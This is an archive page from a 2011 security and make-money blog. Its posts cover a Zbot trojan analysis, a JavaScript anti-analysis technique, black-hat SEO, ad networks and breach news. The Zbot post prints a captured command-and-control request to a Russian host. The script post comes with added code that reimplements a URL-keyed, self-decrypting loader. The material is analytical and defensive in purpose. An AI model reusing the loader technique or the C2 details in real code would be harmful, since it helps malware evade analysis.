Sunday, January 30, 2011

Chinese Hackers Attack Indian Websites


The people who uncovered GhostNet have found a completely separate hacking network that mainly targeted the Indian government. The “Shadow Network”, as this network is now known, has been traced to two people living in Chengdu, China.
China is widely believed to possess a Cyber Warfare Doctrine designed to achieve global “electronic dominance” by 2050. With a yearly budget of $55 million allotted for it and over 10,000 hackers working in tandem, China is second only to the U.S. in cyber snooping prowess.
Chinese hackers compromised computers using malware that traveled as Microsoft Office or PDF files, and used relatively well-known exploits. Once on a machine, however, the malware would communicate with a specific Yahoo Mail account, which allowed it to receive more sophisticated software via attachments, and alert the network to its identity.
The command-and-control network operated primarily through free webhosting services, many of them operating from within the US. As these systems came and went, various social networking services—Google and Baidu blogs, Twitter, etc.—were used to supply the infected systems with a list of alternate hosts. Fortunately for the researchers, at times when a lot of the free webhosts were taken out of action, the social networking updates revealed a core of servers that remained constant; these were exclusively hosted within China.
It seems that the upcoming Commonwealth Games in India are one of the primary targets. Ticket sales and online registration servers have been compromised. The hackers had also looked into tender documents for the Commonwealth Games network infrastructure.
It also seems that the hackers have laid their hands on information on missile systems being developed by India, a list of visas issued by Indian embassies and other sensitive information.
This is not the first time India has come under attack from these Chinese hackers. In 2008 and 2009 too, there were a number of small attacks on computers of the Indian Ministry of External Affairs. As many as 450 computers belonging to the Indian Government were infected, including those of the then National Security Adviser (NSA) M.K. Narayanan, Deputy NSA Shekhar Dutt, the chiefs of the navy, army and air force, and officials in the defense intelligence agencies.

Friday, January 28, 2011

Activate And Use BSNL GPRS Portal For Free

BSNL gives free GPRS access to the CellOne.in portal. Surfing is free, but downloads are charged, so if you download themes, wallpapers, ringtones etc. you will be charged for them.


There is a link to the ‘Free Content’ section.


So in order to activate and use BSNL GPRS free from your phone, follow the steps according to your connection type.


1. TO ACTIVATE BSNL PORTAL
Go to the send message option, type PORTAL (without quotes) and send it to 3733.


2. TO ACTIVATE BSNL PORTAL PREPAID GPRS (2 PAISA PER KB)
Go to the send message option, type gprspre (without quotes) and send it to 3733.


3. FOR THE GPRS 49 PLAN
Go to the send message option, type gprs49 (without quotes) and send it to 3733.


4. FOR THE GPRS 199 PLAN
Go to the send message option, type gprs199 (without quotes) and send it to 3733.



Thursday, January 27, 2011

Sony PS3 Updated To Firmware 3.56

A new PS3 update has gone live. It is a mandatory update, so you will see it if you log on now. It is a security patch for the PS3, described as “a minor update that adds a security patch.” It’ll be interesting to see if this plugs any holes that hackers have created in the PS3’s armor, but rumors are that the encryption key for the new firmware is already out there and available to wily pirates. OOOF....

EasyHits4U Traffic Exchange

Their system is designed to help you promote your site by increasing the number of visitors that actually view your site.
How it works: for every site you visit, you will receive one visitor back to your site. They provide a fair 1:1 exchange ratio. There's no limit to the amount of free hits you can receive per day: 10, 100, or even 1000!

PLUS $0.3 per 1000 surfs
They also reward you with cash and additional traffic for being active in their traffic exchange.


Tuesday, January 25, 2011

Analysis of Trojan-Spy.Win32.Zbot


Analysis Content: Trojan-Spy.Win32.Zbot – Analysis of Malware
Released: 16.11.2008
Author of Analysis: Robert
Contact: robert@novirusthanks.org
Website: http://novirusthanks.org
My friend Steve sent me a Trojan-Spy.Win32.Zbot sample some days ago, and below there is the analysis:
The file I received was named live.exe

and below there is the report of the scan of the file:

Report Generated 17.11.2008 at 12.25.44 (GMT 1)
Time for scan: 23 seconds
Filename: live.exe
File size: 67 KB
MD5 Hash: A785276189E5387AF4C13536CFC76E65
SHA1 Hash: 31E1392EB9793EEDBA74038FBC0AF31382F91B73
CRC32: 2777692707
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 18 on 23
Antivirus Result
a-squared Trojan-Spy.Win32.Zbot.gbr!IK
Avira AntiVir TR/Spy.ZBot.Dro.2
Avast Win32:Downloader-CAT [Trj] (0)
AVG Trojan horse Pakes.ALW
BitDefender Trojan.Spy.Wsnpoem.LE
ClamAV Trojan.Invo-4
Comodo Nothing found!
Dr.Web Trojan.PWS.Panda.31
Ewido Nothing found!
F-PROT 6 Nothing found!
G DATA Trojan-Spy.Win32.Zbot.gbr A
IkarusT3 Trojan-Spy.Win32.Zbot.gbr
Kaspersky Trojan-Spy.Win32.Zbot.gbr
McAfee Spy-Agent.bw trojan
NOD32 v3 Win32/Spy.Agent.NKC trojan
Norman Trojan W32/Banker.DWVI ()
Panda Nothing found!
QuickHeal TrojanSpy.Zbot.gbr
Solo Antivirus Infection Trojan.Spy.Win32.Zbot.Gbr
Sophos Mal/EncPk-CZ
TrendMicro Nothing found!
VBA32 Trojan-Spy.Win32.Zbot.gbr
VirusBuster TrojanSpy.ZBot.Gen!Pac.5
PE Import Tables:

kernel32.dll
+OpenFileMappingA
+DeleteFileA
+DeleteFileW
+GetLastError
+ExitThread
+DeleteAtom
+GetCPInfo
+GetComputerNameA
+GetFileSize
+GetStdHandle
+ReadFile
+GlobalFree
+WriteFile
+GetCommandLineA
+CreateProcessA
+Sleep
+GetConsoleMode
+CreateThread
+FindAtomA
kernel32.dll
+ExitThread
+GlobalFree
+CopyFileExW
+CopyFileW
+GetFileSize
+ReadFile
+GetFileTime
+DeleteFileW
+FindFirstFileA
+GetCommandLineA
+GetStdHandle
+CreateDirectoryA
+OpenFile
+SetLastError
+DeleteAtom
+GetConsoleMode
user32.dll
+IsMenu
+InsertMenuA
+DrawTextW
+GetWindowTextLengthA
+AppendMenuW
+DialogBoxParamW
+GetFocus
+GetWindowTextA
+GetDlgItem
+GetCursor
+CopyIcon
+EndDialog
+CalcMenuBar
+CreateIcon
+BlockInput
+GetMenu
+GetDC
+DrawIconEx
+CloseWindow
+AlignRects
+IsWindow
+DialogBoxParamA
+LoadCursorA
+CopyImage
user32.dll
+CreateIcon
+GetFocus
+BlockInput
+InsertMenuA
+EndDialog
+DrawTextA
+AlignRects
+GetWindowTextLengthA
+IsWindow
+CloseWindow
+CopyImage
+GetDlgItem
+AppendMenuW
+LoadCursorA
+LoadMenuA
+DrawIcon
+CopyIcon
+GetDC
+GetMenu
+DrawIconEx
+GetCursor
+DialogBoxParamW
+CopyRect
kernel32.dll
+GetConsoleMode
+GetCPInfo
+ExitThread
+GetComputerNameA
+GetStdHandle
+ReadFile
+CreateProcessA
+CreateThread
+SetLastError
+CreateDirectoryA
+DeleteAtom
+WriteFile
+Sleep
+CopyFileW
+GetFileSize
+GetFileTime
+CopyFileExW
comctl32.dll
+ImageList_DragLeave
+ImageList_GetIcon
comctl32.dll
+ImageList_Copy
comctl32.dll
+ImageList_Merge
advapi32.dll
+RegCreateKeyW
When I started this .EXE, some files were copied into C:\WINDOWS\system32\; below there is the list:

C:\WINDOWS\system32\twext.exe
C:\WINDOWS\system32\twain_32
C:\WINDOWS\system32\twain_32\local.ds
C:\WINDOWS\system32\twain_32\user.ds
C:\Documents and Settings\NetworkService\Application Data\twain_32
C:\Documents and Settings\NetworkService\Application Data\twain_32\user.ds
C:\Documents and Settings\LocalService\Application Data\twain_32
C:\Documents and Settings\LocalService\Application Data\twain_32\user.ds
Below there is the report of the scan of the file twext.exe:
Report Generated 17.11.2008 at 12.47.07 (GMT 1)
Time for scan: 23 seconds
Filename: twext.exe
File size: 244 KB
MD5 Hash: 1C6A2494488D455757B8B69CF499C6A0
SHA1 Hash: 27CFCD52F3AADC153976AFB12AFDB7AEC1CFF043
CRC32: 288333931
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
ASCII Strings: View
Detection Rate: 16 on 23
Antivirus Result
a-squared Trojan-Spy.Win32.Zbot.gbr!IK
Avira AntiVir TR/Spy.ZBot.Dro.2
Avast Win32:Downloader-CAT [Trj] (0)
AVG Trojan horse Pakes.ALW
BitDefender Trojan.Spy.Wsnpoem.LE
ClamAV Trojan.Invo-4
Comodo Nothing found!
Dr.Web Trojan.PWS.Panda.31
Ewido Nothing found!
F-PROT 6 W32/Trojan3.HR (exact)
G DATA Trojan-Spy.Win32.Zbot.gbr A
IkarusT3 Trojan-Spy.Win32.Zbot.gbr
Kaspersky Trojan-Spy.Win32.Zbot.gbr
McAfee Nothing found!
NOD32 v3 Win32/Spy.Agent.NKC trojan
Norman Trojan W32/Banker.DWVI ()
Panda Nothing found!
QuickHeal TrojanSpy.Zbot.gbr
Solo Antivirus Nothing found!
Sophos Mal/EncPk-CZ
TrendMicro Nothing found!
VBA32 Trojan-Spy.Win32.Zbot.gbr
VirusBuster Nothing found!
The files located in C:\WINDOWS\system32\ were hidden from Explorer search, as shown in the image below:


Below there is an image of the encrypted content of the file user.ds:

The file C:\WINDOWS\system32\twext.exe was injected into the process winlogon.exe and started sending traffic to this host:
==================================================
Index : 4
Protocol : TCP
Local Address : 192.168.1.4
Remote Address : 91.203.93.29
Local Port : 1039
Remote Port : 80
Local Host :
Remote Host :
Service Name : http
Packets : 10
Data Size : 828 Bytes
Total Size : 1.403 Bytes
Capture Time : 17/11/2008 12.21.31:078
==================================================
GET /fidel/conf.bin HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: ddtfff.ru
Pragma: no-cache
HTTP/1.1 404 Not Found
Date: Mon, 17 Nov 2008 18:53:05 GMT
Server: Apache/2
Content-Length: 392
Connection: close
Content-Type: text/html; charset=iso-8859-1
But unfortunately the file /fidel/conf.bin (requested as GET /fidel/conf.bin HTTP/1.0), which the malware tries to download every X amount of time,

does not exist anymore and I cannot analyze it.
Below there is a small summary of this malware activity:


source: http://blog.novirusthanks.org/2008/11/trojan-spywin32zbot-analysis-of-malware/
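A detection-side example added here (it is not part of Robert's analysis): it parses a raw HTTP request like the capture above and scores it against the beacon's visible traits. The indicators (the /conf.bin path, the ddtfff.ru host, the "MSIE 6.0; Win32" User-Agent, HTTP/1.0 with Pragma: no-cache and no Referer) are taken from the capture; the weights, the threshold and the benign comparison request are this example's own assumptions.

```javascript
// Parse a raw HTTP/1.x request (request line plus headers, CRLF or LF
// separated) into its parts. Returns null if the first line is not a
// request line (e.g. a response such as "HTTP/1.1 404 Not Found").
function parseRequest(raw) {
  const lines = raw.split(/\r?\n/).filter(l => l.trim().length > 0);
  const m = /^([A-Z]+)\s+(\S+)\s+HTTP\/(\d\.\d)$/.exec(lines[0] || "");
  if (!m) return null;
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(":");
    if (i < 0) continue;
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { method: m[1], path: m[2], version: m[3], headers };
}

// Traits of the beacon in the capture. Weights and threshold are this
// example's own choice (assumption), not something the analysis states.
const BEACON_INDICATORS = [
  { name: "config fetch of /conf.bin", weight: 3,
    test: r => /\/conf\.bin$/i.test(r.path) },
  { name: "known C2 host ddtfff.ru", weight: 3,
    test: r => (r.headers.host || "").toLowerCase() === "ddtfff.ru" },
  // A genuine IE 6 User-Agent carries a "Windows NT x.y" token, not "Win32".
  { name: "forged User-Agent 'MSIE 6.0; Win32'", weight: 2,
    test: r => /MSIE 6\.0; Win32\)/.test(r.headers["user-agent"] || "") },
  { name: "HTTP/1.0 with Pragma: no-cache and no Referer", weight: 1,
    test: r => r.version === "1.0" && /no-cache/i.test(r.headers.pragma || "")
               && !("referer" in r.headers) },
];
const SUSPICIOUS_THRESHOLD = 4;

// Score one raw request; anything at or above the threshold is flagged.
function scoreRequest(raw) {
  const req = parseRequest(raw);
  if (!req) return { score: 0, matched: [], suspicious: false };
  const hits = BEACON_INDICATORS.filter(ind => ind.test(req));
  const score = hits.reduce((sum, ind) => sum + ind.weight, 0);
  return { score, matched: hits.map(ind => ind.name),
           suspicious: score >= SUSPICIOUS_THRESHOLD };
}

// Constructed samples: the beacon exactly as captured in the post, and an
// ordinary browser request for comparison.
const SAMPLE_BEACON = [
  "GET /fidel/conf.bin HTTP/1.0",
  "Accept: */*",
  "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)",
  "Host: ddtfff.ru",
  "Pragma: no-cache",
].join("\r\n");
const SAMPLE_BROWSER = [
  "GET /index.html HTTP/1.1",
  "Host: www.example.com",
  "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
  "Accept: text/html,*/*",
  "Referer: http://www.example.com/",
].join("\r\n");

for (const sample of [SAMPLE_BEACON, SAMPLE_BROWSER]) {
  console.log(scoreRequest(sample));
}
```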

Monday, January 24, 2011

New Anti-analysis Technique for Script Malware


Recently, we came across JS_VIRTOOL which uses certain Javascript techniques so that encrypted code may not be decrypted and analyzed by a malware analyst.
Here is how this is done:
  1. It retrieves the URL where the malicious script is located.
  2. It retrieves its own function and adds the string of the URL.
  3. It computes the CRC of the function plus the URL.
  4. It decrypts an encrypted code in the script body using the CRC that was computed.
  5. It executes the decrypted code using the eval() function.

Figure 1. Obfuscated code of JS_VIRTOOL

It uses its own function and URL location as the decryption key. The encrypted code, which is the real routine of the malware, will not execute if the function is tampered with and/or the URL is not correct.
If a malware analyst only has the script file sample, without knowing where the file was downloaded from, he will not be able to learn the malware’s actual routines, since the URL is necessary for the decryption to take place. In addition, if this script is placed on a website other than the “correct” one, it will not be successfully decrypted.
Currently, we have multiple samples that all use this particular technique but have different encrypted contents. We suspect that they have the same decrypted data, the only difference being the URL location which will decrypt each sample. We believe this is a technique intended to make it more difficult to track the source and cause of infection. This could potentially increase the time before these malicious scripts are detected and the appropriate solutions are released to users.
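The keying in steps 1 to 5, reproduced as an added example so an analyst can see exactly what must be preserved to get at the real routine (this is not Trend Micro's code or the JS_VIRTOOL sample itself). The cipher (XOR with a xorshift stream seeded from the CRC-32), the stand-in function loaderStub, the payload and the URLs are all constructed assumptions; the post does not say which cipher the sample uses. The analyst-side recoverUrl shows how candidate URLs from proxy logs or referrers can be tried against the untouched function text, and why a reformatted function or a different host yields nothing.

```javascript
// CRC-32 (IEEE polynomial, reflected), the checksum step 3 computes.
const CRC_TABLE = (() => {
  const t = new Uint32Array(256);
  for (let n = 0; n < 256; n++) {
    let c = n;
    for (let k = 0; k < 8; k++) c = (c & 1) ? (0xEDB88320 ^ (c >>> 1)) : (c >>> 1);
    t[n] = c >>> 0;
  }
  return t;
})();
function crc32(str) {
  let crc = 0xFFFFFFFF;
  for (let i = 0; i < str.length; i++) {
    crc = CRC_TABLE[(crc ^ str.charCodeAt(i)) & 0xFF] ^ (crc >>> 8);
  }
  return (crc ^ 0xFFFFFFFF) >>> 0;
}

// Symmetric XOR stream keyed by the CRC (assumed cipher; xorshift32 stream).
function xorCrypt(bytes, seed) {
  let x = (seed >>> 0) || 1;                 // xorshift state must be non-zero
  const out = new Array(bytes.length);
  for (let i = 0; i < bytes.length; i++) {
    x ^= x << 13; x >>>= 0;
    x ^= x >>> 17;
    x ^= x << 5;  x >>>= 0;
    out[i] = bytes[i] ^ (x & 0xFF);
  }
  return out;
}
const toBytes = s => Array.from(s, c => c.charCodeAt(0));
const fromBytes = b => String.fromCharCode(...b);

// Steps 2-4: key = CRC32(own function source + URL). loaderStub is the
// constructed stand-in for the loader; where the real script would eval()
// the result (step 5), the stub only returns it for inspection.
function loaderStub(url) {
  const key = crc32(loaderStub.toString() + url);
  return fromBytes(xorCrypt(PAYLOAD, key));
}

// Constructed sample: a benign payload encrypted under the "correct" URL.
// In a real case PAYLOAD is the blob lifted from the captured script.
const TRUE_URL = "http://example.invalid/landing/index.html";
const PLAINTEXT = 'document.title = "payload decoded";';
const PAYLOAD = xorCrypt(toBytes(PLAINTEXT), crc32(loaderStub.toString() + TRUE_URL));

// Analyst side: with the script body but not the hosting page, try candidate
// URLs against the untouched function text and keep the one that yields
// parseable JavaScript. new Function() only parses; nothing is executed.
function looksLikeScript(text) {
  if (!/^[\t\n\r\x20-\x7e]+$/.test(text)) return false;   // printable ASCII only
  try { new Function(text); return true; } catch (e) { return false; }
}
function recoverUrl(payload, fnSource, candidateUrls) {
  for (const url of candidateUrls) {
    const text = fromBytes(xorCrypt(payload, crc32(fnSource + url)));
    if (looksLikeScript(text)) return { url, text };
  }
  return null;   // no candidate fits, or the function text was altered
}

console.log(recoverUrl(PAYLOAD, loaderStub.toString(),
  ["http://example.invalid/other.html", TRUE_URL]));
```

Because the function's own source is part of the key, even pretty-printing the captured script before analysis changes the CRC and makes every URL fail, so the body must be hashed byte-for-byte as found.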

Black Hat Skills to Make Money Online

What skills do you need to make money online using Black Hat SEO?
There may be overlap between some of the skills in the list below, but if you have all of these in your toolbox, you have the potential to become a successful Black Hat SEO:
Technical skills:

  • Planning
  • Organization
  • Finance
  • System modelling
  • Reverse engineering
  • Analytical
  • Logical
  • Creative
Life skills:
  • Self confidence
  • Skepticism
  • Curiosity
  • Ingenuity
  • Stubbornness
  • Generosity
  • Iron proof work ethics
I’ll follow up this post describing each of these skills and the role they play in your money making ventures.

Black Hat SEO Vs White Hat SEO

As the earning opportunities of optimized websites increase daily, search engine marketing has turned into an essential industry. There are many methods of search engine marketing, and not all of them are legal. Some people who want a great income in the short term resort to dishonest methods, often known as Black Hat search engine optimization. The good old SEO link building methods that bring success in the long run and have more durable outcomes are called White Hat search engine optimization. Because some people follow these black hat methods, it becomes difficult for those who take the straightforward route to obtain a great page rank even after sincere effort.
Black Hat search engine optimization methods shatter the philosophy of search engines. Their practitioners are spammers who do not offer real content on their websites. Their pages contain only some keywords and no useful, informative content that would really be worth a great page rank. Yet they manage to climb the ladder within the search result pages and taste the fruits even though they don’t deserve it. Many genuine websites lose income because of them.
Some from the black hat Search engine optimization techniques are,
-Keyword Stuffing
-Creating Doorway pages
-Blog Spamming
-Web page cloaking
-Using hits Generators
-Making their pages refresh instantly to improve web page impressions.
If these are discovered out by Google, it will penalize the site and might even ban them.
White Hat search engine optimization techniques are the organic or natural methods of obtaining a great page rank for your website. They follow the rules and regulations strictly. They are loved by search engines because they contain high quality content and offer dependable outcomes. The typical White Hat search engine optimization techniques are:
-Getting high quality one way links
-Frequent updates
-Writing blogs associated with their industry
-Link building through article submissions with the help of a link building service
-Originality
These methods are well liked by search engines. Although it takes a lot of time to implement them, the outcomes will last longer than those of black hat methods.
There are some methods that fall midway between black hat and white hat techniques. They are known as Grey Area search engine optimization. Content scraping is an example of this. In this method, search engine results and descriptions are captured by software and added to the page as content. Although this method is allowed by Google at the moment, it might get banned at any time as it becomes more and more abused.

Thursday, January 20, 2011

Best adsense alternatives to earn money from your website and blog

Getting banned from adsense is very common nowadays. Though there are many networks on the market, I am listing below some of the best alternatives to adsense.


Adbrite:-
  +ve: 
  • Adbrite is considered one of the best alternatives to adsense and it is my favorite site.
  • They even accept adult sites.
  • Many options to choose from, like full-page ads, text, banner, in-video and inline ads.
  • Can run along with adsense as long as you maintain a different look-and-feel.
  • Minimum payment $5.00

  -ve:
  • You need to be patient since it takes time to fill up your ad inventory.


  +ve:
  • Works very well on making-money-online and webmaster type sites.
  • Can run along with adsense as long as you maintain a different look-and-feel.
  • Minimum payment $10 via paypal.
  -ve:
  • The complaint I hear most often about this network is that it doesn't have enough ad inventory for other types of sites.

Chitika:-
  +ve:
  • The ads are contextual by default
  • Ads can be set to non-contextual and can be targeted to specific keywords
  • Can run along with adsense
  • Minimum payment $10 via paypal and $50 by check.
  -ve:
  • US, UK and Australia traffic is preferred.


Clicksor:-
  +ve: 
  • Online demo clearly illustrates how the contextual and keyword hover techniques work.
  • Campaigns are normally begun within approximately 24 hours of submission of your keywords.
  • Campaigns can be terminated at any time with full return of unused account balance, but a written request for termination is required.
  • Payment option of PayPal, which makes it popular with international websites.
   -ve: 
  • English-only ads accepted
  • Ads appear to load very slowly which may deter visitors from waiting until the page is fully loaded.
  • Although some users are uncertain if affiliates of Clicksor can also use Google (due to code needed to be inserted in page violating Google's TOS), others claim to have had no problem with having both programs running at the same time.
  • Apparent concentration on benefits of affiliate program over actual PPC products.

BackLinks:-

  +ve:
  • Make money selling text link ads
  • Prices start from $0.50 per link per month to $75 per link per month
  • Nice way to earn since it works with ppc
  • Minimum payout is $10 via paypal

  -ve:
  • Site should have at least page rank 1 to earn good money

Wednesday, January 12, 2011

Study shows most antivirus software misses hacker exploits half the time.

A majority of security software suites still fail to detect attacks on PCs even after the style of attack has been known for some time, underscoring how hackers still have the upper hand.
NSS Labs, which conducts tests of security software suites, tested how security packages from 10 major companies detect so-called "client-side exploits." In such incidents a hacker attacks a vulnerability in software such as web browsers, browser plug-ins or desktop applications such as Adobe Acrobat and Flash.
NSS Labs is an independent security software company that unlike many other testing companies does not accept vendor money for performing comparative evaluations. Vendors are notified, however, and are allowed to make some configuration changes before NSS Labs' evaluation.

"This test - the first of its kind in the industry - was designed to identify how effective the most popular corporate endpoint products are at protecting against exploits," according to the report. "All of the vulnerabilities exploited during this test had been publicly available for months (if not years) prior to the test, and had also been observed in real attacks on real companies."
The attacks are often done by tricking a user into visiting a hostile Web site that delivers an exploit, or a specially crafted code sequence that unlocks a vulnerability in a software application, according to the NSS Labs report.
There can be different variants of exploits that attack the same vulnerability but target different parts of a computer's memory. Security vendors frequently add signatures to their databases that enable the software to detect specific exploits, but those exploits may evolve.
"A vendor may develop a signature for the initial exploit with the intent to later deliver subsequent signatures," the report said. "Our testing has revealed that most vendors do not take these important additional steps."
Only one of the 10 software suites tested detected all 123 exploits and variants, which were designed to attack vulnerabilities in software such as Microsoft's Internet Explorer browser, Firefox, Adobe Acrobat, Apple's QuickTime and others.
The 10 software suites scored vastly differently, with one catching all of the exploits at the top end and one catching 29 percent at the low end.
NSS Labs said the average protective score was 76 percent among the 10 suites for "original exploits," or the first exploit to be made publicly against a particular software vulnerability. Three of the 10 caught all original exploits. For variant exploits, the average protective score was 58 percent.
"Based on market share, between 70 to 75 percent of the market is under protected," the report said. "Keeping antivirus software up-to-date does not yield adequate protection against exploits, as evidence by coverage gaps for vulnerabilities several years old."
NSS Labs president, Rick Moy, said all of the vulnerabilities are "low-hanging fruit." Information on the vulnerabilities has been available in some cases since 2006, which means the hackers all know the problems and the exploits are still being used.
But security software companies have tended to focus on the malicious software delivered after an exploit. Those samples number in the millions now. Exploits, however, are far less numerous and would be a better choke point for protecting computers.
Patching the known vulnerabilities will also stop the exploits, but many companies won't apply all patches immediately since it may break other software those companies are using, Moy said. Security software represents a good "virtual patch," but only if it can detect those exploits and subsequent malware, he said.
NSS Labs puts the suites in three categories: "recommend," which means a product performed well and should be used in an enterprise; "neutral," which means a product performed reasonably well and should continue to be used if it is already in use; and "caution," which means the product had poor test results and organisations using it should review their security posture.

User names and passwords of 1.3 million stolen in weekend Gawker Media hack

Hackers broke into servers belonging to Gawker Media over the weekend, causing mischief and making off with more than 1.3 million user names and passwords. The accounts belong to users who have commented on websites run by the company, ranging from the flagship Gawker to highly trafficked websites such as Gizmodo and Lifehacker.

In a virtual slap across the face, the hackers, who used the name "Gnosis," published an article on Gawker that linked to the source code of the site as well as the 487MB file containing details of the compromised accounts. While the data is encrypted via MD5 hash, "simple ones may be vulnerable to a brute-force attack" noted Gawker Media in a statement that also urged users to change their passwords.

Elsewhere, various media outlets and bloggers are digging into the most popular passwords that are in use. On this front, The Wall Street Journal has a detailed article on The Top 50 Gawker Media Passwords. As expected, the need to use different passwords for different sites is also a topic that is reiterated across the web, with dedicated password tools recommended to maintain them.

Beyond the obvious embarrassment and security implications of the stolen account details, however, the biggest repercussion is a long-term one for Gawker. In a purported interview with members of Gnosis, one of the hackers bragged about how a site like Gawker, with its large code base, is stuck running what is in effect public code until a new private version can be released, something which will take a long time. In the meantime, the hacker noted that "anyone can view how it works, meaning exploits can be found for the code."

For more on this story:
- check out this article at New York Times
- check out this article at Computerworld
- check out this article at The Wall Street Journal
- check out this article at Geekosystem

Monday, January 10, 2011

Note For readers ,Please read...

Hi, welcome to the BGRF Blog. This blog contains posts about various security-related topics such as exploits, malware and other security threats, antivirus, firewalls, and also a dedicated section for default port numbers and passwords of many products, etc., to help you get a better idea about computer security.

Notes For New Users ( Must Read) :-

1. This blog is not for beginners, as it may contain posts which are somewhat difficult to understand [for beginners we are planning to create a separate section soon], so don't post comments asking what it is all about, etc.


2.This Blog is completely legal and it does not encourage illegal activities such as hacking.


3.Please don't Flame the authors (all comments are monitored)

4. If you are interested in posting or saying something, you can contact me using the contact link.

-Thank you
Black